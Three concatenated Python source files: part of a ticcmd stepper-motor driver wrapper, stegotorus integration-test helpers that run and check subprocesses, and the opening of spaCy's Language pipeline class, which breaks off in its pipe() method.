self.loop.run_until_complete(self.stop_future)
self.loop.close()
def stop_async(self):
"""Stop loop."""
self.stop_future.set_result(True)
def stop(self):
"""Stop loop and join thread."""
self.loop.call_soon_threadsafe(self.stop_async)
self._stop_thread()
def _stop_thread(self):
self.thread.join()
def _ticcmd_future(self, *args):
"""Run ticcmd in another thread."""
future = asyncio.wrap_future(
asyncio.run_coroutine_threadsafe(self._ticcmd_remote(*args), self.loop))
future.add_done_callback(Util.raise_exceptions)
return future
def _ticcmd(self, *args):
"""Run ticcmd in another thread and forget about the response."""
self.loop.call_soon_threadsafe(self._run_subprocess_ticcmd, *args)
async def _ticcmd_remote(self, *args):
"""Return a future with the result of ticcmd."""
return self._run_subprocess_ticcmd(*args)
def _run_subprocess_ticcmd(self, *args):
"""Run ticcmd.
This will block the asyncio loop in the thread so only one command can run at a time.
However, it will not block MPF because we will call this via run_coroutine_threadsafe from another thread.
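For example (serial number hypothetical), halt_and_hold() ends up invoking
roughly: ticcmd --halt-and-hold -d 00123456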
"""
args = list(args)
args.append('-d')
args.append(str(self._serial_number))
try:
output = subprocess.check_output(['ticcmd'] + args, stderr=subprocess.STDOUT)
return output
except subprocess.CalledProcessError as e:
self.log.debug("Exception: %s", str(e.output))
raise TicError(e.output)
async def get_status(self):
"""Return the current status of the TIC device."""
cmd_return = await self._ticcmd_future('-s', '--full')
status = ruamel.yaml.safe_load(cmd_return)
return status
def halt_and_hold(self):
"""Stop the motor abruptly without respecting the deceleration limit."""
self._ticcmd('--halt-and-hold')
def halt_and_set_position(self, position):
"""Stop the motor abruptly without respecting the deceleration limit and set the current position."""
self._ticcmd('--halt-and-set-position', str(int(position)))
def rotate_to_position(self, position):
"""Tells the TIC to move the stepper to the target position.
Args:
position (number): The desired position in microsteps
"""
self._ticcmd('--position', str(int(position)))
def rotate_by_velocity(self, velocity):
"""Tells the TIC to move the stepper continuously at the specified velocity.
Args:
velocity (number): The desired speed in microsteps per 10,000 s
"""
self._ticcmd('--velocity', str(int(velocity)))
def reset_command_timeout(self):
"""Tells the TIC to reset the internal command timeout."""
self._ticcmd('--reset-command-timeout')
def exit_safe_start(self):
"""Tells the TIC to exit the safe start mode."""
self._ticcmd('--exit-safe-start')
def set_step_mode(self, mode):
"""Set the Step Mode of the stepper.
Args:
mode (number): One of 1, 2, 4, 8, 16, 32, the number of microsteps per step
"""
self._ticcmd('--step-mode', str(int(mode)))
def set_max_speed(self, speed):
"""Set the max speed of the stepper.
Args:
speed (number): The maximum speed of the stepper in microsteps per 10,000s
"""
self._ticcmd('--max-speed', str(int(speed)))
def set_starting_speed(self, speed):
"""Set the starting speed of the stepper.
Args:
speed (number): The starting speed of the stepper in microsteps per 10,000s
"""
self._ticcmd('--starting-speed', str(int(speed)))
def set_max_acceleration(self, acceleration):
"""Set the max acceleration of the stepper.
Args:
acceleration (number): The maximum acceleration of the stepper in microsteps per 100 s^2
"""
self._ticcmd('--max-accel', str(int(acceleration)))
def set_max_deceleration(self, deceleration):
"""Set the max deceleration of the stepper.
Args:
deceleration (number): The maximum deceleration of the stepper in microsteps per 100 s^2
"""
self._ticcmd('--max-decel', str(int(deceleration)))
def set_current_limit(self, current):
"""Set the max current of the stepper driver.
Args:
current (number): The maximum current of the stepper in milliamps
"""
self._ticcmd('--current', str(int(current)))
def energize(self):
"""Energize the Stepper."""
self._ticcmd('--energize')
def go_home(self, forward):
"""Home the stepper in the given direction."""
if forward:
direction = "fwd"
else:
direction = "rev"
self._ticcmd('--home', direction)  # pass the direction as a separate argument so ticcmd parses it
|
itestlib.py
|
# Copyright 2011, 2012 SRI International
# See LICENSE for other credits and copying information
# Integration tests for stegotorus - library routines.
import difflib
import errno
import os
import re
import shlex
import socket
import subprocess
import threading
import time
TIMEOUT_LEN = 5 # seconds
# Helper: stick "| " at the beginning of each line of |s|.
def indent(s):
return "| " + "\n| ".join(s.strip().split("\n"))
# Helper: generate unified-format diffs between two named strings.
# Pythonic escaped-string syntax is used for unprintable characters.
def diff(label, expected, received):
if expected == received:
return ""
else:
return (label + "\n| "
+ "\n| ".join(s.encode("string_escape")
for s in
difflib.unified_diff(expected.split("\n"),
received.split("\n"),
"expected", "received",
lineterm=""))
+ "\n")
# Helper: Run stegotorus instances and confirm that they have
# completed without any errors.
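# A typical test-case pattern might look like this (the stegotorus
# configuration arguments are illustrative only):
#   st = Stegotorus("chop", "socks", "127.0.0.1:1080")
#   ... drive some traffic through it ...
#   report = st.check_completion("stegotorus smoke test")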
# set MALLOC_CHECK_ in subprocess environment; this gets us
# better memory-error behavior from glibc and is harmless
# elsewhere. Mode 2 is "abort immediately, without flooding
# /dev/tty with useless diagnostics" (the documentation SAYS
# they go to stderr, but they don't).
stegotorus_env = {}
stegotorus_env.update(os.environ)
stegotorus_env['MALLOC_CHECK_'] = '2'
# check for a grinder
if 'GRINDER' in stegotorus_env:
stegotorus_grindv = shlex.split(stegotorus_env['GRINDER'])
else:
stegotorus_grindv = []
class Stegotorus(subprocess.Popen):
def __init__(self, *args, **kwargs):
argv = stegotorus_grindv[:]
argv.extend(("./stegotorus", "--log-min-severity=debug",
"--timestamp-logs"))
if len(args) == 1 and (isinstance(args[0], list) or
isinstance(args[0], tuple)):
argv.extend(args[0])
else:
argv.extend(args)
subprocess.Popen.__init__(self, argv,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=stegotorus_env,
close_fds=True,
**kwargs)
# wait for startup completion, which is signaled by
# the subprocess closing its stdout
self.output = self.stdout.read()
# read stderr in a separate thread, since we will
# have several processes outstanding at the same time
self.communicator = threading.Thread(target=self.run_communicate)
self.communicator.start()
self.timeout = threading.Timer(TIMEOUT_LEN, self.stop)
self.timeout.start()
severe_error_re = re.compile(
r"\[(?:warn|err(?:or)?)\]|ERROR SUMMARY: [1-9]|LEAK SUMMARY:")
def stop(self):
if self.poll() is None:
self.terminate()
def run_communicate(self):
self.errput = self.stderr.read()
def check_completion(self, label, force_stderr=False):
self.stdin.close()
self.communicator.join()
if self.poll() is not None:
self.timeout.cancel()
self.timeout.join()
self.wait()
report = ""
# exit status should be zero
if self.returncode > 0:
report += label + " exit code: %d\n" % self.returncode
elif self.returncode < 0:
report += label + " killed: signal %d\n" % -self.returncode
# there should be nothing on stdout
if self.output != "":
report += label + " stdout:\n%s\n" % indent(self.output)
# there will be debugging messages on stderr, but there should be
# no [warn], [err], or [error] messages.
if (force_stderr or
self.severe_error_re.search(self.errput) or
self.returncode != 0):
report += label + " stderr:\n%s\n" % indent(self.errput)
return report
# As above, but for the 'tltester' test helper rather than for
# stegotorus itself.
class Tltester(subprocess.Popen):
def __init__(self, timeline, extra_args=(), **kwargs):
argv = ["./tltester"]
argv.extend(extra_args)
subprocess.Popen.__init__(self, argv,
stdin=open(timeline, "rU"),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=stegotorus_env,
close_fds=True,
**kwargs)
# invoke communicate() in a separate thread, since we will
# have several processes outstanding at the same time
self.communicator = threading.Thread(target=self.run_communicate)
self.communicator.start()
self.timeout = threading.Timer(TIMEOUT_LEN, self.stop)
self.timeout.start()
def stop(self):
if self.poll() is None:
self.terminate()
def run_communicate(self):
(out, err) = self.communicate()
self.output = out
self.errput = err
def check_completion(self, label):
self.communicator.join()
self.timeout.cancel()
self.timeout.join()
self.poll()
# exit status should be zero, and there should be nothing on
# stderr
if self.returncode != 0 or self.errput != "":
report = ""
# exit status should be zero
if self.returncode > 0:
report += label + " exit code: %d\n" % self.returncode
elif self.returncode < 0:
report += label + " killed: signal %d\n" % -self.returncode
if self.errput != "":
report += label + " stderr:\n%s\n" % indent(self.errput)
raise AssertionError(report)
# caller will crunch the output
return self.output
|
language.py
|
# coding: utf8
from __future__ import absolute_import, unicode_literals
import atexit
import random
import itertools
from warnings import warn
from spacy.util import minibatch
import weakref
import functools
from collections import OrderedDict
from contextlib import contextmanager
from copy import copy, deepcopy
from thinc.neural import Model
import srsly
import multiprocessing as mp
from itertools import chain, cycle
from .tokenizer import Tokenizer
from .vocab import Vocab
from .lemmatizer import Lemmatizer
from .lookups import Lookups
from .pipeline import DependencyParser, Tagger
from .pipeline import Tensorizer, EntityRecognizer, EntityLinker
from .pipeline import SimilarityHook, TextCategorizer, Sentencizer
from .pipeline import merge_noun_chunks, merge_entities, merge_subtokens
from .pipeline import EntityRuler
from .pipeline import Morphologizer
from .compat import izip, basestring_, is_python2
from .gold import GoldParse
from .scorer import Scorer
from ._ml import link_vectors_to_models, create_default_optimizer
from .attrs import IS_STOP, LANG
from .lang.punctuation import TOKENIZER_PREFIXES, TOKENIZER_SUFFIXES
from .lang.punctuation import TOKENIZER_INFIXES
from .lang.tokenizer_exceptions import TOKEN_MATCH
from .lang.tag_map import TAG_MAP
from .tokens import Doc
from .lang.lex_attrs import LEX_ATTRS, is_stop
from .errors import Errors, Warnings, deprecation_warning, user_warning
from . import util
from . import about
class BaseDefaults(object):
@classmethod
def create_lemmatizer(cls, nlp=None, lookups=None):
if lookups is None:
lookups = cls.create_lookups(nlp=nlp)
return Lemmatizer(lookups=lookups)
@classmethod
def create_lookups(cls, nlp=None):
root = util.get_module_path(cls)
filenames = {name: root / filename for name, filename in cls.resources}
if LANG in cls.lex_attr_getters:
lang = cls.lex_attr_getters[LANG](None)
user_lookups = util.get_entry_point(util.ENTRY_POINTS.lookups, lang, {})
filenames.update(user_lookups)
lookups = Lookups()
for name, filename in filenames.items():
data = util.load_language_data(filename)
lookups.add_table(name, data)
return lookups
@classmethod
def create_vocab(cls, nlp=None):
lookups = cls.create_lookups(nlp)
lemmatizer = cls.create_lemmatizer(nlp, lookups=lookups)
lex_attr_getters = dict(cls.lex_attr_getters)
# This is messy, but it's the minimal working fix to Issue #639.
lex_attr_getters[IS_STOP] = functools.partial(is_stop, stops=cls.stop_words)
vocab = Vocab(
lex_attr_getters=lex_attr_getters,
tag_map=cls.tag_map,
lemmatizer=lemmatizer,
lookups=lookups,
)
for tag_str, exc in cls.morph_rules.items():
for orth_str, attrs in exc.items():
vocab.morphology.add_special_case(tag_str, orth_str, attrs)
return vocab
@classmethod
def create_tokenizer(cls, nlp=None):
rules = cls.tokenizer_exceptions
token_match = cls.token_match
prefix_search = (
util.compile_prefix_regex(cls.prefixes).search if cls.prefixes else None
)
suffix_search = (
util.compile_suffix_regex(cls.suffixes).search if cls.suffixes else None
)
infix_finditer = (
util.compile_infix_regex(cls.infixes).finditer if cls.infixes else None
)
vocab = nlp.vocab if nlp is not None else cls.create_vocab(nlp)
return Tokenizer(
vocab,
rules=rules,
prefix_search=prefix_search,
suffix_search=suffix_search,
infix_finditer=infix_finditer,
token_match=token_match,
)
pipe_names = ["tagger", "parser", "ner"]
token_match = TOKEN_MATCH
prefixes = tuple(TOKENIZER_PREFIXES)
suffixes = tuple(TOKENIZER_SUFFIXES)
infixes = tuple(TOKENIZER_INFIXES)
tag_map = dict(TAG_MAP)
tokenizer_exceptions = {}
stop_words = set()
lemma_rules = {}
lemma_exc = {}
lemma_index = {}
lemma_lookup = {}
morph_rules = {}
lex_attr_getters = LEX_ATTRS
syntax_iterators = {}
resources = {}
writing_system = {"direction": "ltr", "has_case": True, "has_letters": True}
single_orth_variants = []
paired_orth_variants = []
class Language(object):
"""A text-processing pipeline. Usually you'll load this once per process,
and pass the instance around your application.
Defaults (class): Settings, data and factory methods for creating the `nlp`
object and processing pipeline.
lang (unicode): Two-letter language ID, i.e. ISO code.
DOCS: https://spacy.io/api/language
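EXAMPLE (illustrative):
    >>> nlp = Language()
    >>> nlp.add_pipe(nlp.create_pipe("sentencizer"))
    >>> doc = nlp("This is a sentence. This is another one.")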
"""
Defaults = BaseDefaults
lang = None
factories = {
"tokenizer": lambda nlp: nlp.Defaults.create_tokenizer(nlp),
"tensorizer": lambda nlp, **cfg: Tensorizer(nlp.vocab, **cfg),
"tagger": lambda nlp, **cfg: Tagger(nlp.vocab, **cfg),
"morphologizer": lambda nlp, **cfg: Morphologizer(nlp.vocab, **cfg),
"parser": lambda nlp, **cfg: DependencyParser(nlp.vocab, **cfg),
"ner": lambda nlp, **cfg: EntityRecognizer(nlp.vocab, **cfg),
"entity_linker": lambda nlp, **cfg: EntityLinker(nlp.vocab, **cfg),
"similarity": lambda nlp, **cfg: SimilarityHook(nlp.vocab, **cfg),
"textcat": lambda nlp, **cfg: TextCategorizer(nlp.vocab, **cfg),
"sentencizer": lambda nlp, **cfg: Sentencizer(**cfg),
"merge_noun_chunks": lambda nlp, **cfg: merge_noun_chunks,
"merge_entities": lambda nlp, **cfg: merge_entities,
"merge_subtokens": lambda nlp, **cfg: merge_subtokens,
"entity_ruler": lambda nlp, **cfg: EntityRuler(nlp, **cfg),
}
def __init__(
self, vocab=True, make_doc=True, max_length=10 ** 6, meta={}, **kwargs
):
"""Initialise a Language object.
vocab (Vocab): A `Vocab` object. If `True`, a vocab is created via
`Language.Defaults.create_vocab`.
make_doc (callable): A function that takes text and returns a `Doc`
object. Usually a `Tokenizer`.
meta (dict): Custom meta data for the Language class. Is written to by
models to add model meta data.
max_length (int):
Maximum number of characters in a single text. The current v2 models
may run out of memory on extremely long texts, due to large internal
allocations. You should segment these texts into meaningful units,
e.g. paragraphs, subsections etc., before passing them to spaCy.
Default maximum length is 1,000,000 characters (1mb). As a rule of
thumb, if all pipeline components are enabled, spaCy's default
models currently require roughly 1GB of temporary memory per
100,000 characters in one text.
RETURNS (Language): The newly constructed object.
"""
user_factories = util.get_entry_points(util.ENTRY_POINTS.factories)
self.factories.update(user_factories)
self._meta = dict(meta)
self._path = None
if vocab is True:
factory = self.Defaults.create_vocab
vocab = factory(self, **meta.get("vocab", {}))
if vocab.vectors.name is None:
vocab.vectors.name = meta.get("vectors", {}).get("name")
else:
if (self.lang and vocab.lang) and (self.lang != vocab.lang):
raise ValueError(Errors.E150.format(nlp=self.lang, vocab=vocab.lang))
self.vocab = vocab
if make_doc is True:
factory = self.Defaults.create_tokenizer
make_doc = factory(self, **meta.get("tokenizer", {}))
self.tokenizer = make_doc
self.pipeline = []
self.max_length = max_length
self._optimizer = None
@property
def path(self):
return self._path
@property
def meta(self):
if self.vocab.lang:
self._meta.setdefault("lang", self.vocab.lang)
else:
self._meta.setdefault("lang", self.lang)
self._meta.setdefault("name", "model")
self._meta.setdefault("version", "0.0.0")
self._meta.setdefault("spacy_version", ">={}".format(about.__version__))
self._meta.setdefault("description", "")
self._meta.setdefault("author", "")
self._meta.setdefault("email", "")
self._meta.setdefault("url", "")
self._meta.setdefault("license", "")
self._meta["vectors"] = {
"width": self.vocab.vectors_length,
"vectors": len(self.vocab.vectors),
"keys": self.vocab.vectors.n_keys,
"name": self.vocab.vectors.name,
}
self._meta["pipeline"] = self.pipe_names
self._meta["labels"] = self.pipe_labels
return self._meta
@meta.setter
def meta(self, value):
self._meta = value
# Conveniences to access pipeline components
# Shouldn't be used anymore!
@property
def tensorizer(self):
return self.get_pipe("tensorizer")
@property
def tagger(self):
return self.get_pipe("tagger")
@property
def parser(self):
return self.get_pipe("parser")
@property
def entity(self):
return self.get_pipe("ner")
@property
def linker(self):
return self.get_pipe("entity_linker")
@property
def matcher(self):
return self.get_pipe("matcher")
@property
def pipe_names(self):
"""Get names of available pipeline components.
RETURNS (list): List of component name strings, in order.
"""
return [pipe_name for pipe_name, _ in self.pipeline]
@property
def pipe_labels(self):
"""Get the labels set by the pipeline components, if available (if
the component exposes a labels property).
RETURNS (dict): Labels keyed by component name.
"""
labels = OrderedDict()
for name, pipe in self.pipeline:
if hasattr(pipe, "labels"):
labels[name] = list(pipe.labels)
return labels
def get_pipe(self, name):
"""Get a pipeline component for a given component name.
name (unicode): Name of pipeline component to get.
RETURNS (callable): The pipeline component.
DOCS: https://spacy.io/api/language#get_pipe
"""
for pipe_name, component in self.pipeline:
if pipe_name == name:
return component
raise KeyError(Errors.E001.format(name=name, opts=self.pipe_names))
def create_pipe(self, name, config=dict()):
"""Create a pipeline component from a factory.
name (unicode): Factory name to look up in `Language.factories`.
config (dict): Configuration parameters to initialise component.
RETURNS (callable): Pipeline component.
DOCS: https://spacy.io/api/language#create_pipe
"""
if name not in self.factories:
if name == "sbd":
raise KeyError(Errors.E108.format(name=name))
else:
raise KeyError(Errors.E002.format(name=name))
factory = self.factories[name]
return factory(self, **config)
def add_pipe(
self, component, name=None, before=None, after=None, first=None, last=None
):
"""Add a component to the processing pipeline. Valid components are
callables that take a `Doc` object, modify it and return it. Only one
of before/after/first/last can be set. Default behaviour is "last".
component (callable): The pipeline component.
name (unicode): Name of pipeline component. Overwrites existing
component.name attribute if available. If no name is set and
the component exposes no name attribute, component.__name__ is
used. An error is raised if a name already exists in the pipeline.
before (unicode): Component name to insert component directly before.
after (unicode): Component name to insert component directly after.
first (bool): Insert component first / not first in the pipeline.
last (bool): Insert component last / not last in the pipeline.
DOCS: https://spacy.io/api/language#add_pipe
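EXAMPLE (with a hypothetical custom component):
    >>> def clean_component(doc):
    >>>     return doc
    >>> nlp.add_pipe(clean_component, name="clean", before="parser")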
"""
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E004.format(component=component)
raise ValueError(msg)
if name is None:
if hasattr(component, "name"):
name = component.name
elif hasattr(component, "__name__"):
name = component.__name__
elif hasattr(component, "__class__") and hasattr(
component.__class__, "__name__"
):
name = component.__class__.__name__
else:
name = repr(component)
if name in self.pipe_names:
raise ValueError(Errors.E007.format(name=name, opts=self.pipe_names))
if sum([bool(before), bool(after), bool(first), bool(last)]) >= 2:
raise ValueError(Errors.E006)
pipe = (name, component)
if last or not any([first, before, after]):
self.pipeline.append(pipe)
elif first:
self.pipeline.insert(0, pipe)
elif before and before in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(before), pipe)
elif after and after in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(after) + 1, pipe)
else:
raise ValueError(
Errors.E001.format(name=before or after, opts=self.pipe_names)
)
def has_pipe(self, name):
"""Check if a component name is present in the pipeline. Equivalent to
`name in nlp.pipe_names`.
name (unicode): Name of the component.
RETURNS (bool): Whether a component of the name exists in the pipeline.
DOCS: https://spacy.io/api/language#has_pipe
"""
return name in self.pipe_names
def replace_pipe(self, name, component):
"""Replace a component in the pipeline.
name (unicode): Name of the component to replace.
component (callable): Pipeline component.
DOCS: https://spacy.io/api/language#replace_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E135.format(name=name)
raise ValueError(msg)
self.pipeline[self.pipe_names.index(name)] = (name, component)
def rename_pipe(self, old_name, new_name):
"""Rename a pipeline component.
old_name (unicode): Name of the component to rename.
new_name (unicode): New name of the component.
DOCS: https://spacy.io/api/language#rename_pipe
"""
if old_name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=old_name, opts=self.pipe_names))
if new_name in self.pipe_names:
raise ValueError(Errors.E007.format(name=new_name, opts=self.pipe_names))
i = self.pipe_names.index(old_name)
self.pipeline[i] = (new_name, self.pipeline[i][1])
def remove_pipe(self, name):
"""Remove a component from the pipeline.
name (unicode): Name of the component to remove.
RETURNS (tuple): A `(name, component)` tuple of the removed component.
DOCS: https://spacy.io/api/language#remove_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
return self.pipeline.pop(self.pipe_names.index(name))
def __call__(self, text, disable=[], component_cfg=None):
"""Apply the pipeline to some text. The text can span multiple sentences,
and can contain arbitrary whitespace. Alignment into the original string
is preserved.
text (unicode): The text to be processed.
disable (list): Names of the pipeline components to disable.
component_cfg (dict): An optional dictionary with extra keyword arguments
for specific components.
RETURNS (Doc): A container for accessing the annotations.
DOCS: https://spacy.io/api/language#call
"""
if len(text) > self.max_length:
raise ValueError(
Errors.E088.format(length=len(text), max_length=self.max_length)
)
doc = self.make_doc(text)
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if name in disable:
continue
if not hasattr(proc, "__call__"):
raise ValueError(Errors.E003.format(component=type(proc), name=name))
doc = proc(doc, **component_cfg.get(name, {}))
if doc is None:
raise ValueError(Errors.E005.format(name=name))
return doc
def disable_pipes(self, *names):
"""Disable one or more pipeline components. If used as a context
manager, the pipeline will be restored to the initial state at the end
of the block. Otherwise, a DisabledPipes object is returned, that has
a `.restore()` method you can use to undo your changes.
DOCS: https://spacy.io/api/language#disable_pipes
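EXAMPLE (illustrative):
    >>> with nlp.disable_pipes("tagger", "parser"):
    >>>     doc = nlp("This text will not be tagged or parsed")
    >>> doc = nlp("This text will be tagged and parsed again")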
"""
return DisabledPipes(self, *names)
def make_doc(self, text):
return self.tokenizer(text)
def _format_docs_and_golds(self, docs, golds):
"""Format golds and docs before update models."""
expected_keys = ("words", "tags", "heads", "deps", "entities", "cats", "links")
gold_objs = []
doc_objs = []
for doc, gold in zip(docs, golds):
if isinstance(doc, basestring_):
doc = self.make_doc(doc)
if not isinstance(gold, GoldParse):
unexpected = [k for k in gold if k not in expected_keys]
if unexpected:
err = Errors.E151.format(unexp=unexpected, exp=expected_keys)
raise ValueError(err)
gold = GoldParse(doc, **gold)
doc_objs.append(doc)
gold_objs.append(gold)
return doc_objs, gold_objs
def update(self, docs, golds, drop=0.0, sgd=None, losses=None, component_cfg=None):
"""Update the models in the pipeline.
docs (iterable): A batch of `Doc` objects.
golds (iterable): A batch of `GoldParse` objects.
drop (float): The dropout rate.
sgd (callable): An optimizer.
losses (dict): Dictionary to update with the loss, keyed by component.
component_cfg (dict): Config parameters for specific pipeline
components, keyed by component name.
DOCS: https://spacy.io/api/language#update
"""
if len(docs) != len(golds):
raise IndexError(Errors.E009.format(n_docs=len(docs), n_golds=len(golds)))
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
# Allow dict of args to GoldParse, instead of GoldParse objects.
docs, golds = self._format_docs_and_golds(docs, golds)
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
pipes = list(self.pipeline)
random.shuffle(pipes)
if component_cfg is None:
component_cfg = {}
for name, proc in pipes:
if not hasattr(proc, "update"):
continue
grads = {}
kwargs = component_cfg.get(name, {})
kwargs.setdefault("drop", drop)
proc.update(docs, golds, sgd=get_grads, losses=losses, **kwargs)
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
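# Minimal training-loop sketch for `update` (illustrative only; the text,
# annotation dict and hyper-parameters below are made up):
#
#     optimizer = nlp.begin_training()
#     train_data = [("Uber blew through $1 million", {"entities": [(0, 4, "ORG")]})]
#     for epoch in range(10):
#         losses = {}
#         texts, annotations = zip(*train_data)
#         nlp.update(texts, annotations, drop=0.2, sgd=optimizer, losses=losses)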
def rehearse(self, docs, sgd=None, losses=None, config=None):
"""Make a "rehearsal" update to the models in the pipeline, to prevent
forgetting. Rehearsal updates run an initial copy of the model over some
data, and update the model so its current predictions are more like the
initial ones. This is useful for keeping a pretrained model on-track,
even if you're updating it with a smaller set of examples.
docs (iterable): A batch of `Doc` objects.
drop (float): The dropout rate.
sgd (callable): An optimizer.
RETURNS (dict): Results from the update.
EXAMPLE:
>>> raw_text_batches = minibatch(raw_texts)
>>> for labelled_batch in minibatch(zip(train_docs, train_golds)):
>>> docs, golds = zip(*labelled_batch)
>>> nlp.update(docs, golds)
>>> raw_batch = [nlp.make_doc(text) for text in next(raw_text_batches)]
>>> nlp.rehearse(raw_batch)
"""
# TODO: document
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
docs = list(docs)
for i, doc in enumerate(docs):
if isinstance(doc, basestring_):
docs[i] = self.make_doc(doc)
pipes = list(self.pipeline)
random.shuffle(pipes)
if config is None:
config = {}
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
for name, proc in pipes:
if not hasattr(proc, "rehearse"):
continue
grads = {}
proc.rehearse(docs, sgd=get_grads, losses=losses, **config.get(name, {}))
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
return losses
def preprocess_gold(self, docs_golds):
"""Can be called before training to pre-process gold data. By default,
it handles nonprojectivity and adds missing tags to the tag map.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
YIELDS (tuple): Tuples of preprocessed `Doc` and `GoldParse` objects.
"""
for name, proc in self.pipeline:
if hasattr(proc, "preprocess_gold"):
docs_golds = proc.preprocess_gold(docs_golds)
for doc, gold in docs_golds:
yield doc, gold
def begin_training(self, get_gold_tuples=None, sgd=None, component_cfg=None, **cfg):
"""Allocate models, pre-process training data and acquire a trainer and
optimizer. Used as a contextmanager.
get_gold_tuples (function): Function returning gold data
component_cfg (dict): Config parameters for specific components.
**cfg: Config parameters.
RETURNS: An optimizer.
DOCS: https://spacy.io/api/language#begin_training
"""
if get_gold_tuples is None:
get_gold_tuples = lambda: []
# Populate vocab
else:
for _, annots_brackets in get_gold_tuples():
_ = annots_brackets.pop()
for annots, _ in annots_brackets:
for word in annots[1]:
_ = self.vocab[word] # noqa: F841
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if hasattr(proc, "begin_training"):
kwargs = component_cfg.get(name, {})
kwargs.update(cfg)
proc.begin_training(
get_gold_tuples,
pipeline=self.pipeline,
sgd=self._optimizer,
**kwargs
)
return self._optimizer
def resume_training(self, sgd=None, **cfg):
"""Continue training a pretrained model.
Create and return an optimizer, and initialize "rehearsal" for any pipeline
component that has a .rehearse() method. Rehearsal is used to prevent
models from "forgetting" their initialised "knowledge". To perform
rehearsal, collect samples of text you want the models to retain performance
on, and call nlp.rehearse() with a batch of Doc objects.
"""
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
for name, proc in self.pipeline:
if hasattr(proc, "_rehearsal_model"):
proc._rehearsal_model = deepcopy(proc.model)
return self._optimizer
def evaluate(
self, docs_golds, verbose=False, batch_size=256, scorer=None, component_cfg=None
):
"""Evaluate a model's pipeline components.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
verbose (bool): Print debugging information.
batch_size (int): Batch size to use.
scorer (Scorer): Optional `Scorer` to use. If not passed in, a new one
will be created.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
RETURNS (Scorer): The scorer containing the evaluation results.
DOCS: https://spacy.io/api/language#evaluate
"""
if scorer is None:
scorer = Scorer(pipeline=self.pipeline)
if component_cfg is None:
component_cfg = {}
docs, golds = zip(*docs_golds)
docs = [
self.make_doc(doc) if isinstance(doc, basestring_) else doc for doc in docs
]
golds = list(golds)
for name, pipe in self.pipeline:
kwargs = component_cfg.get(name, {})
kwargs.setdefault("batch_size", batch_size)
if not hasattr(pipe, "pipe"):
docs = _pipe(pipe, docs, kwargs)
else:
docs = pipe.pipe(docs, **kwargs)
for doc, gold in zip(docs, golds):
if not isinstance(gold, GoldParse):
gold = GoldParse(doc, **gold)
if verbose:
print(doc)
kwargs = component_cfg.get("scorer", {})
kwargs.setdefault("verbose", verbose)
scorer.score(doc, gold, **kwargs)
return scorer
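# Usage sketch for `evaluate` (illustrative; `dev_data` is a hypothetical list
# of (text, annotations) tuples in the same format accepted by `update`):
#
#     scorer = nlp.evaluate(dev_data, verbose=False, batch_size=32)
#     print(scorer.ents_p, scorer.ents_r, scorer.ents_f)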
@contextmanager
def use_params(self, params, **cfg):
"""Replace weights of models in the pipeline with those provided in the
params dictionary. Can be used as a contextmanager, in which case,
models go back to their original weights after the block.
params (dict): A dictionary of parameters keyed by model ID.
**cfg: Config parameters.
EXAMPLE:
>>> with nlp.use_params(optimizer.averages):
>>> nlp.to_disk('/tmp/checkpoint')
"""
contexts = [
pipe.use_params(params)
for name, pipe in self.pipeline
if hasattr(pipe, "use_params")
]
# TODO: Having trouble with contextlib
# Workaround: these aren't actually context managers atm.
for context in contexts:
try:
next(context)
except StopIteration:
pass
yield
for context in contexts:
try:
next(context)
except StopIteration:
pass
def pipe(
self,
texts,
as_tuples=False,
n_threads=-1,
batch_size=1000,
disable=[],
cleanup=False,
component_cfg=None,
n_process=1,
):
"""Process texts as a stream, and yield `Doc` objects in order.
texts (iterator): A sequence of texts to process.
as_tuples (bool): If set to True, inputs should be a sequence of
(text, context) tuples. Output will then be a sequence of
(doc, context) tuples. Defaults to False.
batch_size (int): The number of texts to buffer.
disable (list): Names of the pipeline components to disable.
cleanup (bool): If True, unneeded strings are freed to control memory
use. Experimental.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
n_process (int): Number of processes to use when processing the texts (multiprocessing is only supported in Python 3). If -1, `multiprocessing.cpu_count()` is used.
YIELDS (Doc): Documents in the order of the original text.
DOCS: https://spacy.io/api/language#pipe
"""
# raw_texts will be used later to stop the iterator.
